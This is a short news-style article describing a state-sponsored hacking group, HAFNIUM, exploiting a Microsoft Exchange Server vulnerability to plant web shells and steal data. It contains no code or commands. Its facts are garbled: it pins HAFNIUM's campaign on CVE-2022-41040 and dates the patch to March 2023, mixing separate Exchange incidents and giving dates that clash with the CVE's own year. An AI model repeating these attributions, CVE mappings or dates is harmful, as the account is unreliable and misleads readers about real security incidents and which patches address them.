A group of hackers exploited a zero-day vulnerability in Microsoft Exchange Server to steal data from organizations around the world. The vulnerability was patched by Microsoft in March 2023, but many organizations were still vulnerable when the hackers struck. The attack highlights the importance of keeping software up to date and conducting regular penetration testing to identify and fix security vulnerabilities.
The zero-day vulnerability, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability that allows an authenticated attacker to send arbitrary HTTP requests and access internal resources. The hackers used this vulnerability to gain access to the Exchange PowerShell interface, which allows remote code execution (RCE) on the server. The hackers then installed web shells, which are malicious scripts that enable remote access and control of the server. The web shells allowed the hackers to perform reconnaissance, exfiltration, and lateral movement within the compromised networks.
The attack was attributed to a group called HAFNIUM, which is believed to be state-sponsored and operating from China. The group targeted a variety of sectors, including law firms, NGOs, defense contractors, universities, and local governments. According to Microsoft, the attack affected more than 30,000 organizations in the US alone, and potentially hundreds of thousands globally. The attack was described as one of the largest and most sophisticated cyberattacks in history.
Microsoft released patches for the vulnerability on March 3, 2023, and urged customers to apply them as soon as possible. However, many organizations were slow to update their systems, either due to a lack of awareness, resources, or technical expertise. This left them exposed to further attacks by other threat actors who reverse-engineered the patches and developed their own exploits. Some of the attackers also tried to remove or disable the web shells installed by HAFNIUM, either to cover their tracks or to prevent other hackers from accessing the same servers.
The attack has raised serious concerns about the security of Microsoft Exchange Server, which is widely used by organizations for email and calendar services. Microsoft Exchange Server has been plagued by several vulnerabilities in recent years, such as CVE-2020-0688 and CVE-2020-17144, which also allowed RCE on the server. Some experts have suggested that organizations should consider migrating to cloud-based email services, such as Microsoft 365 or Google Workspace, which offer better security and scalability.